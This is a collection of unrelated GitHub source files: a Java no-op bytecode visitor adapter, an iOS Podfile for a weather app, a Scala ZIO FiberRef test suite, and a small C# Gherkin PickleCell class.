// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore_0(int)
*/
@Override
public void _fstore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore_1(int)
*/
@Override
public void _fstore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore_2(int)
*/
@Override
public void _fstore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore_3(int)
*/
@Override
public void _fstore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fstore(int, int)
*/
@Override
public void _fstore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_fsub(int)
*/
@Override
public void _fsub(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_getfield(int, int, IConstantPoolEntry)
*/
@Override
public void _getfield(int pc, int index, IConstantPoolEntry constantFieldref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_getstatic(int, int, IConstantPoolEntry)
*/
@Override
public void _getstatic(
int pc,
int index,
IConstantPoolEntry constantFieldref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_goto_w(int, int)
*/
@Override
public void _goto_w(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_goto(int, int)
*/
@Override
public void _goto(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2b(int)
*/
@Override
public void _i2b(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2c(int)
*/
@Override
public void _i2c(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2d(int)
*/
@Override
public void _i2d(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2f(int)
*/
@Override
public void _i2f(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2l(int)
*/
@Override
public void _i2l(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_i2s(int)
*/
@Override
public void _i2s(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iadd(int)
*/
@Override
public void _iadd(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iaload(int)
*/
@Override
public void _iaload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iand(int)
*/
@Override
public void _iand(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iastore(int)
*/
@Override
public void _iastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_0(int)
*/
@Override
public void _iconst_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_1(int)
*/
@Override
public void _iconst_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_2(int)
*/
@Override
public void _iconst_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_3(int)
*/
@Override
public void _iconst_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_4(int)
*/
@Override
public void _iconst_4(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_5(int)
*/
@Override
public void _iconst_5(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iconst_m1(int)
*/
@Override
public void _iconst_m1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_idiv(int)
*/
@Override
public void _idiv(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_acmpeq(int, int)
*/
@Override
public void _if_acmpeq(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_acmpne(int, int)
*/
@Override
public void _if_acmpne(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmpeq(int, int)
*/
@Override
public void _if_icmpeq(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmpge(int, int)
*/
@Override
public void _if_icmpge(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmpgt(int, int)
*/
@Override
public void _if_icmpgt(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmple(int, int)
*/
@Override
public void _if_icmple(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmplt(int, int)
*/
@Override
public void _if_icmplt(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_if_icmpne(int, int)
*/
@Override
public void _if_icmpne(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifeq(int, int)
*/
@Override
public void _ifeq(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifge(int, int)
*/
@Override
public void _ifge(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifgt(int, int)
*/
@Override
public void _ifgt(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifle(int, int)
*/
@Override
public void _ifle(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iflt(int, int)
*/
@Override
public void _iflt(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifne(int, int)
*/
@Override
public void _ifne(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifnonnull(int, int)
*/
@Override
public void _ifnonnull(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ifnull(int, int)
*/
@Override
public void _ifnull(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iinc(int, int, int)
*/
@Override
public void _iinc(int pc, int index, int _const) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload_0(int)
*/
@Override
public void _iload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload_1(int)
*/
@Override
public void _iload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload_2(int)
*/
@Override
public void _iload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload_3(int)
*/
@Override
public void _iload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iload(int, int)
*/
@Override
public void _iload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_imul(int)
*/
@Override
public void _imul(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ineg(int)
*/
@Override
public void _ineg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_instanceof(int, int, IConstantPoolEntry)
*/
@Override
public void _instanceof(int pc, int index, IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokedynamic(int, int, IConstantPoolEntry, IConstantPoolEntry)
* @since 3.6
* @deprecated This has been replaced with {@link IBytecodeVisitor#_invokedynamic(int, int, IConstantPoolEntry)}
*/
@Override
public void _invokedynamic(
int pc,
int index,
IConstantPoolEntry nameEntry,
IConstantPoolEntry descriptorEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokedynamic(int, int, IConstantPoolEntry)
* @since 3.8
*/
@Override
public void _invokedynamic(
int pc,
int index,
IConstantPoolEntry invokeDynamicEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokeinterface(int, int, byte, IConstantPoolEntry)
*/
@Override
public void _invokeinterface(
int pc,
int index,
byte nargs,
IConstantPoolEntry constantInterfaceMethodref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokespecial(int, int, IConstantPoolEntry)
*/
@Override
public void _invokespecial(
int pc,
int index,
IConstantPoolEntry constantMethodref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokestatic(int, int, IConstantPoolEntry)
*/
@Override
public void _invokestatic(
int pc,
int index,
IConstantPoolEntry constantMethodref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_invokevirtual(int, int, IConstantPoolEntry)
*/
@Override
public void _invokevirtual(
int pc,
int index,
IConstantPoolEntry constantMethodref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ior(int)
*/
@Override
public void _ior(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_irem(int)
*/
@Override
public void _irem(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ireturn(int)
*/
@Override
public void _ireturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ishl(int)
*/
@Override
public void _ishl(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ishr(int)
*/
@Override
public void _ishr(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore_0(int)
*/
@Override
public void _istore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore_1(int)
*/
@Override
public void _istore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore_2(int)
*/
@Override
public void _istore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore_3(int)
*/
@Override
public void _istore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_istore(int, int)
*/
@Override
public void _istore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_isub(int)
*/
@Override
public void _isub(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_iushr(int)
*/
@Override
public void _iushr(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ixor(int)
*/
@Override
public void _ixor(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_jsr_w(int, int)
*/
@Override
public void _jsr_w(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_jsr(int, int)
*/
@Override
public void _jsr(int pc, int branchOffset) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_l2d(int)
*/
@Override
public void _l2d(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_l2f(int)
*/
@Override
public void _l2f(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_l2i(int)
*/
@Override
public void _l2i(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ladd(int)
*/
@Override
public void _ladd(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_laload(int)
*/
@Override
public void _laload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_land(int)
*/
@Override
public void _land(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lastore(int)
*/
@Override
public void _lastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lcmp(int)
*/
@Override
public void _lcmp(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lconst_0(int)
*/
@Override
public void _lconst_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lconst_1(int)
*/
@Override
public void _lconst_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ldc_w(int, int, IConstantPoolEntry)
*/
@Override
public void _ldc_w(int pc, int index, IConstantPoolEntry constantPoolEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ldc(int, int, IConstantPoolEntry)
*/
@Override
public void _ldc(int pc, int index, IConstantPoolEntry constantPoolEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ldc2_w(int, int, IConstantPoolEntry)
*/
@Override
public void _ldc2_w(int pc, int index, IConstantPoolEntry constantPoolEntry) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ldiv(int)
*/
@Override
public void _ldiv(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload_0(int)
*/
@Override
public void _lload_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload_1(int)
*/
@Override
public void _lload_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload_2(int)
*/
@Override
public void _lload_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload_3(int)
*/
@Override
public void _lload_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lload(int, int)
*/
@Override
public void _lload(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lmul(int)
*/
@Override
public void _lmul(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lneg(int)
*/
@Override
public void _lneg(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lookupswitch(int, int, int, int[][])
*/
@Override
public void _lookupswitch(
int pc,
int defaultoffset,
int npairs,
int[][] offset_pairs) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lor(int)
*/
@Override
public void _lor(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lrem(int)
*/
@Override
public void _lrem(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lreturn(int)
*/
@Override
public void _lreturn(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lshl(int)
*/
@Override
public void _lshl(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lshr(int)
*/
@Override
public void _lshr(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore_0(int)
*/
@Override
public void _lstore_0(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore_1(int)
*/
@Override
public void _lstore_1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore_2(int)
*/
@Override
public void _lstore_2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore_3(int)
*/
@Override
public void _lstore_3(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lstore(int, int)
*/
@Override
public void _lstore(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lsub(int)
*/
@Override
public void _lsub(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lushr(int)
*/
@Override
public void _lushr(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_lxor(int)
*/
@Override
public void _lxor(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_monitorenter(int)
*/
@Override
public void _monitorenter(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_monitorexit(int)
*/
@Override
public void _monitorexit(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_multianewarray(int, int, int, IConstantPoolEntry)
*/
@Override
public void _multianewarray(
int pc,
int index,
int dimensions,
IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_new(int, int, IConstantPoolEntry)
*/
@Override
public void _new(int pc, int index, IConstantPoolEntry constantClass) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_newarray(int, int)
*/
@Override
public void _newarray(int pc, int atype) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_nop(int)
*/
@Override
public void _nop(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_pop(int)
*/
@Override
public void _pop(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_pop2(int)
*/
@Override
public void _pop2(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_putfield(int, int, IConstantPoolEntry)
*/
@Override
public void _putfield(int pc, int index, IConstantPoolEntry constantFieldref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_putstatic(int, int, IConstantPoolEntry)
*/
@Override
public void _putstatic(
int pc,
int index,
IConstantPoolEntry constantFieldref) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_ret(int, int)
*/
@Override
public void _ret(int pc, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_return(int)
*/
@Override
public void _return(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_saload(int)
*/
@Override
public void _saload(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_sastore(int)
*/
@Override
public void _sastore(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_sipush(int, short)
*/
@Override
public void _sipush(int pc, short value) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_swap(int)
*/
@Override
public void _swap(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_tableswitch(int, int, int, int, int[])
*/
@Override
public void _tableswitch(
int pc,
int defaultoffset,
int low,
int high,
int[] jump_offsets) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_wide(int, int, int, int)
*/
@Override
public void _wide(int pc, int iincopcode, int index, int _const) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_wide(int, int, int)
*/
@Override
public void _wide(int pc, int opcode, int index) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_breakpoint(int)
*/
@Override
public void _breakpoint(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_impdep1(int)
*/
@Override
public void _impdep1(int pc) {
// default behavior is to do nothing
}
/**
* @see IBytecodeVisitor#_impdep2(int)
*/
@Override
public void _impdep2(int pc) {
// default behavior is to do nothing
}
}
|
{
"pile_set_name": "Github"
}
|
source 'https://github.com/CocoaPods/Specs.git'
platform :ios, '8.0'
use_frameworks!
target :Weather do
pod 'Swinject'
pod 'Alamofire'
pod 'ModelMapper'
pod 'ASToast'
pod 'RealmSwift'
end
target :WeatherTests do
pod 'Quick', '1.1'
pod 'Nimble', '6.1'
pod 'Swinject'
pod 'RealmSwift'
end
|
{
"pile_set_name": "Github"
}
|
package zio
import zio.FiberRefSpecUtil._
import zio.duration._
import zio.test.Assertion._
import zio.test.TestAspect._
import zio.test._
import zio.test.environment.Live
object FiberRefSpec extends ZIOBaseSpec {
import ZIOTag._
def spec: ZSpec[Environment, Failure] = suite("FiberRefSpec")(
suite("Create a new FiberRef with a specified value and check if:")(
testM("`get` returns the current value") {
for {
fiberRef <- FiberRef.make(initial)
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
},
testM("`get` returns the current value for a child") {
for {
fiberRef <- FiberRef.make(initial)
child <- fiberRef.get.fork
value <- child.join
} yield assert(value)(equalTo(initial))
},
testM("`getAndUpdate` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.getAndUpdate(_ => update)
value2 <- fiberRef.get
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(update))
},
testM("`getAndUpdateSome` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.getAndUpdateSome { case _ =>
update
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(update))
},
testM("`getAndUpdateSome` not changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.getAndUpdateSome {
case _ if false => update
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(initial))
},
testM("`locally` restores original value") {
for {
fiberRef <- FiberRef.make(initial)
local <- fiberRef.locally(update)(fiberRef.get)
value <- fiberRef.get
} yield assert(local)(equalTo(update)) && assert(value)(equalTo(initial))
},
testM("`locally` restores parent's value") {
for {
fiberRef <- FiberRef.make(initial)
child <- fiberRef.locally(update)(fiberRef.get).fork
local <- child.join
value <- fiberRef.get
} yield assert(local)(equalTo(update)) && assert(value)(equalTo(initial))
},
testM("`locally` restores undefined value") {
for {
child <- FiberRef.make(initial).fork
// Don't use join as it inherits values from child.
fiberRef <- child.await.flatMap(ZIO.done(_))
localValue <- fiberRef.locally(update)(fiberRef.get)
value <- fiberRef.get
} yield assert(localValue)(equalTo(update)) && assert(value)(equalTo(initial))
},
testM("`modify` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.modify(_ => (1, update))
value2 <- fiberRef.get
} yield assert(value1)(equalTo(1)) && assert(value2)(equalTo(update))
},
testM("`modifySome` not changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.modifySome(2) {
case _ if false => (1, update)
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(2)) && assert(value2)(equalTo(initial))
},
testM("`set` updates the current value") {
for {
fiberRef <- FiberRef.make(initial)
_ <- fiberRef.set(update)
value <- fiberRef.get
} yield assert(value)(equalTo(update))
},
testM("`set` by a child doesn't update parent's value") {
for {
fiberRef <- FiberRef.make(initial)
promise <- Promise.make[Nothing, Unit]
_ <- (fiberRef.set(update) *> promise.succeed(())).fork
_ <- promise.await
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
},
testM("`updateAndGet` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.updateAndGet(_ => update)
value2 <- fiberRef.get
} yield assert(value1)(equalTo(update)) && assert(value2)(equalTo(update))
},
testM("`updateSomeAndGet` changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.updateSomeAndGet { case _ =>
update
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(update)) && assert(value2)(equalTo(update))
},
testM("`updateSomeAndGet` not changes value") {
for {
fiberRef <- FiberRef.make(initial)
value1 <- fiberRef.updateSomeAndGet {
case _ if false => update
}
value2 <- fiberRef.get
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(initial))
},
testM("its value is inherited on join") {
for {
fiberRef <- FiberRef.make(initial)
child <- fiberRef.set(update).fork
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(update))
},
testM("initial value is always available") {
for {
child <- FiberRef.make(initial).fork
fiberRef <- child.await.flatMap(ZIO.done(_))
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
},
testM("its value is inherited after simple race") {
for {
fiberRef <- FiberRef.make(initial)
_ <- fiberRef.set(update1).race(fiberRef.set(update2))
value <- fiberRef.get
} yield assert(value)(equalTo(update1)) || assert(value)(equalTo(update2))
},
testM("its value is inherited after a race with a bad winner") {
for {
fiberRef <- FiberRef.make(initial)
badWinner = fiberRef.set(update1) *> ZIO.fail("ups")
goodLoser = fiberRef.set(update2) *> looseTimeAndCpu
_ <- badWinner.race(goodLoser)
value <- fiberRef.get
} yield assert(value)(equalTo(update2))
},
testM("its value is not inherited after a race of losers") {
for {
fiberRef <- FiberRef.make(initial)
loser1 = fiberRef.set(update1) *> ZIO.fail("ups1")
loser2 = fiberRef.set(update2) *> ZIO.fail("ups2")
_ <- loser1.race(loser2).ignore
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
} @@ zioTag(errors),
testM("the value of the loser is inherited in zipPar") {
for {
fiberRef <- FiberRef.make(initial)
latch <- Promise.make[Nothing, Unit]
winner = fiberRef.set(update1) *> latch.succeed(()).unit
loser = latch.await *> fiberRef.set(update2) *> looseTimeAndCpu
_ <- winner.zipPar(loser)
value <- fiberRef.get
} yield assert(value)(equalTo(update2))
} @@ zioTag(errors),
testM("nothing gets inherited with a failure in zipPar") {
for {
fiberRef <- FiberRef.make(initial)
success = fiberRef.set(update)
failure1 = fiberRef.set(update1) *> ZIO.fail(":-(")
failure2 = fiberRef.set(update2) *> ZIO.fail(":-O")
_ <- success.zipPar(failure1.zipPar(failure2)).orElse(ZIO.unit)
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
} @@ zioTag(errors),
testM("fork function is applied on fork - 1") {
def increment(x: Int): Int = x + 1
for {
fiberRef <- FiberRef.make(initial = 0, fork = increment)
child <- ZIO.unit.fork
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(1))
},
testM("fork function is applied on fork - 2") {
def increment(x: Int): Int = x + 1
for {
fiberRef <- FiberRef.make(initial = 0, fork = increment)
child <- ZIO.unit.fork.flatMap(_.join).fork
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(2))
},
testM("join function is applied on join - 1") {
for {
fiberRef <- FiberRef.make(initial = 0, join = math.max)
child <- fiberRef.update(_ + 1).fork
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(1))
},
testM("join function is applied on join - 2") {
for {
fiberRef <- FiberRef.make(initial = 0, join = math.max)
child <- fiberRef.update(_ + 1).fork
_ <- fiberRef.update(_ + 2)
_ <- child.join
value <- fiberRef.get
} yield assert(value)(equalTo(2))
},
testM("its value is inherited in a trivial race") {
for {
fiberRef <- FiberRef.make(initial)
_ <- fiberRef.set(update).raceAll(Iterable.empty)
value <- fiberRef.get
} yield assert(value)(equalTo(update))
},
testM("the value of the winner is inherited when racing two ZIOs with raceAll") {
for {
fiberRef <- FiberRef.make(initial)
latch <- Promise.make[Nothing, Unit]
winner1 = fiberRef.set(update1) *> latch.succeed(())
loser1 = latch.await *> fiberRef.set(update2) *> looseTimeAndCpu
_ <- loser1.raceAll(List(winner1))
value1 <- fiberRef.get <* fiberRef.set(initial)
winner2 = fiberRef.set(update1)
loser2 = fiberRef.set(update2) *> ZIO.fail(":-O")
_ <- loser2.raceAll(List(winner2))
value2 <- fiberRef.get <* fiberRef.set(initial)
} yield assert((value1, value2))(equalTo((update1, update1)))
} @@ flaky,
testM("the value of the winner is inherited when racing many ZIOs with raceAll") {
for {
fiberRef <- FiberRef.make(initial)
n = 63
latch <- Promise.make[Nothing, Unit]
winner1 = fiberRef.set(update1) *> latch.succeed(())
loser1 = latch.await *> fiberRef.set(update2) *> looseTimeAndCpu
losers1 = Iterable.fill(n)(loser1)
_ <- winner1.raceAll(losers1)
value1 <- fiberRef.get <* fiberRef.set(initial)
winner2 = fiberRef.set(update1) *> looseTimeAndCpu
loser2 = fiberRef.set(update2) *> ZIO.fail("Nooooo")
losers2 = Iterable.fill(n)(loser2)
_ <- winner2.raceAll(losers2)
value2 <- fiberRef.get <* fiberRef.set(initial)
} yield assert((value1, value2))(equalTo((update1, update1)))
},
testM("nothing gets inherited when racing failures with raceAll") {
for {
fiberRef <- FiberRef.make(initial)
loser = fiberRef.set(update) *> ZIO.fail("darn")
_ <- loser.raceAll(Iterable.fill(63)(loser)).orElse(ZIO.unit)
value <- fiberRef.get
} yield assert(value)(equalTo(initial))
} @@ zioTag(errors),
testM("an unsafe handle is initialized and updated properly") {
for {
fiberRef <- FiberRef.make(initial)
handle <- fiberRef.unsafeAsThreadLocal
value1 <- UIO(handle.get())
_ <- fiberRef.set(update1)
value2 <- UIO(handle.get())
_ <- UIO(handle.set(update2))
value3 <- fiberRef.get
} yield assert((value1, value2, value3))(equalTo((initial, update1, update2)))
},
testM("unsafe handles work properly when initialized in a race") {
for {
fiberRef <- FiberRef.make(initial)
initHandle = fiberRef.unsafeAsThreadLocal
handle <- ZIO.raceAll(initHandle, Iterable.fill(64)(initHandle))
value1 <- UIO(handle.get())
doUpdate = fiberRef.set(update)
_ <- ZIO.raceAll(doUpdate, Iterable.fill(64)(doUpdate))
value2 <- UIO(handle.get())
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(update))
},
testM("unsafe handles work properly when accessed concurrently") {
for {
fiberRef <- FiberRef.make(0)
setAndGet =
(value: Int) => setRefOrHandle(fiberRef, value) *> fiberRef.unsafeAsThreadLocal.flatMap(h => UIO(h.get()))
n = 64
fiber <- ZIO.forkAll(1.to(n).map(setAndGet))
values <- fiber.join
} yield assert(values)(equalTo(1.to(n)))
},
testM("unsafe handles don't see updates from other fibers") {
for {
fiberRef <- FiberRef.make(initial)
handle <- fiberRef.unsafeAsThreadLocal
value1 <- UIO(handle.get())
n = 64
fiber <- ZIO.forkAll(Iterable.fill(n)(fiberRef.set(update).race(UIO(handle.set(update)))))
_ <- fiber.await
value2 <- UIO(handle.get())
} yield assert(value1)(equalTo(initial)) && assert(value2)(equalTo(initial))
},
testM("unsafe handles keep their values if there are async boundaries") {
for {
fiberRef <- FiberRef.make(0)
test = (i: Int) =>
for {
handle <- fiberRef.unsafeAsThreadLocal
_ <- setRefOrHandle(fiberRef, handle, i)
_ <- ZIO.yieldNow
value <- UIO(handle.get())
} yield assert(value)(equalTo(i))
n = 64
results <- ZIO.reduceAllPar(test(1), 2.to(n).map(test))(_ && _)
} yield results
},
testM("calling remove on unsafe handles restores their initial values") {
for {
fiberRef <- FiberRef.make(initial)
_ <- fiberRef.set(update)
handle <- fiberRef.unsafeAsThreadLocal
_ <- UIO(handle.remove())
value1 <- fiberRef.get
value2 <- UIO(handle.get())
} yield assert((value1, value2))(equalTo((initial, initial)))
}
)
)
}
object FiberRefSpecUtil {
val (initial, update, update1, update2) = ("initial", "update", "update1", "update2")
val looseTimeAndCpu: ZIO[Live, Nothing, Unit] = Live.live {
(ZIO.yieldNow <* clock.sleep(1.nano)).repeatN(100)
}
def setRefOrHandle(fiberRef: FiberRef[Int], value: Int): UIO[Unit] =
if (value % 2 == 0) fiberRef.set(value)
else fiberRef.unsafeAsThreadLocal.flatMap(h => UIO(h.set(value)))
def setRefOrHandle(fiberRef: FiberRef[Int], handle: ThreadLocal[Int], value: Int): UIO[Unit] =
if (value % 2 == 0) fiberRef.set(value)
else UIO(handle.set(value))
}
|
{
"pile_set_name": "Github"
}
|
namespace Gherkin.Pickles
{
public class PickleCell
{
public PickleLocation Location { get; private set; }
public string Value { get; private set; }
public PickleCell(PickleLocation location, string value)
{
Location = location;
Value = value;
}
}
}
|
{
